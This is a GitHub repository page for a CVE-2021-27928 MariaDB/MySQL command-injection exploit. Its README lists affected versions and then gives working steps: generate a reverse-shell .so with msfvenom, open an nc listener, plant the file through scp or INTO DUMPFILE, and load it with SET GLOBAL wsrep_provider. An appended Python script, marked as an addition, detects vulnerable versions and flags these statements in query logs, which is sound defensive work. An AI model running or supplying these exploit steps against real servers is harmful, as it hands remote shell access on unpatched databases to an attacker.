https://github.com/al1ex/cve-2021-27928
CVE-2021-27928 MariaDB/MySQL - 'wsrep provider' command injection vulnerability
- Host: GitHub
- URL: https://github.com/al1ex/cve-2021-27928
- Owner: Al1ex
- Created: 2021-04-15T06:40:49.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-29T15:57:12.000Z (almost 2 years ago)
- Last Synced: 2025-03-25T05:07:31.968Z (about 2 months ago)
- Topics: cve, cve-2021-27928, mariadb
- Size: 1.35 MB
- Stars: 62
- Watchers: 1
- Forks: 16
- Open Issues: 2
Metadata Files:
- Readme: README.md
README
## Information
~~~
Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
Date: 03/18/2021
Exploit Author: Central InfoSec
Version:
MariaDB 10.2 before 10.2.37
10.3 before 10.3.28
10.4 before 10.4.18
10.5 before 10.5.9
Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
Tested on: Linux
CVE : CVE-2021-27928
~~~
## How to Exploit
Step 1: Create the reverse shell payload
```
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so
```
Step 2: Start a listener
```
nc -lnvp
```
Step 3: Copy the payload to the target machine
**Via SCP**
```
scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so
```
**Via Dumpfile**
```
python3 -c 'print(open("CVE-2021-27928.so", "rb").read().hex())'
mysql -u -p -h
SELECT UNHEX('PYTHON_OUTPUT') into dumpfile '/tmp/CVE-2021-27928.so';
```
Step 4: Execute the payload
```
mysql -u -p -h
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
```
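For defenders, the statements in Steps 3 and 4 are what shows up in a general query log or audit log, and the version list under Information tells you which MariaDB servers need patching. The following is an added example, not part of the original repository: it checks a `SELECT VERSION()` string against that list and flags the two statement shapes in log lines. The log format, the sample lines and the allowlisted Galera library path are assumptions; Percona Server and the wsrep patch for MySQL are not covered by the version check.

```python
import re

# First fixed patch level per MariaDB series, taken from the version list on this page.
FIXED = {(10, 2): 37, (10, 3): 28, (10, 4): 18, (10, 5): 9}

# Assumed legitimate provider library; adjust to the path your Galera package installs.
ALLOWED_PROVIDERS = {"/usr/lib/galera/libgalera_smm.so"}

SET_PROVIDER = re.compile(
    r"\bSET\s+(?:GLOBAL\s+|@@GLOBAL\.)wsrep_provider\s*=\s*['\"]?([^'\";\s]+)", re.I)
DUMPFILE = re.compile(r"\bINTO\s+DUMPFILE\s+['\"]([^'\"]+)['\"]", re.I)

def is_affected(version):
    """True/False for a MariaDB series listed on this page, None for anything else."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return None
    major, minor, patch = map(int, m.groups())
    fixed = FIXED.get((major, minor))
    return None if fixed is None else patch < fixed

def scan(lines, allowed=ALLOWED_PROVIDERS):
    """Return (line_number, reason, path) for statements matching Steps 3 and 4."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = DUMPFILE.search(line)
        if m and m.group(1).endswith(".so"):
            findings.append((n, "shared object written via INTO DUMPFILE", m.group(1)))
        m = SET_PROVIDER.search(line)
        if m and m.group(1).lower() != "none" and m.group(1) not in allowed:
            findings.append((n, "wsrep_provider set to unexpected path", m.group(1)))
    return findings

# Constructed sample log lines (not real captures).
SAMPLE_LOG = [
    "2021-03-20T10:00:01Z 12 Query SELECT VERSION()",
    "2021-03-20T10:00:05Z 12 Query SELECT UNHEX('7f454c46') INTO DUMPFILE '/tmp/example.so'",
    "2021-03-20T10:00:09Z 12 Query SET GLOBAL wsrep_provider=\"/tmp/example.so\"",
    "2021-03-20T10:01:00Z 14 Query SET GLOBAL wsrep_provider='/usr/lib/galera/libgalera_smm.so'",
]

if __name__ == "__main__":
    print(is_affected("10.3.27-MariaDB-0+deb10u1"))
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
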
## Reference
https://www.exploit-db.com/exploits/49765
https://jira.mariadb.org/browse/MDEV-25179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928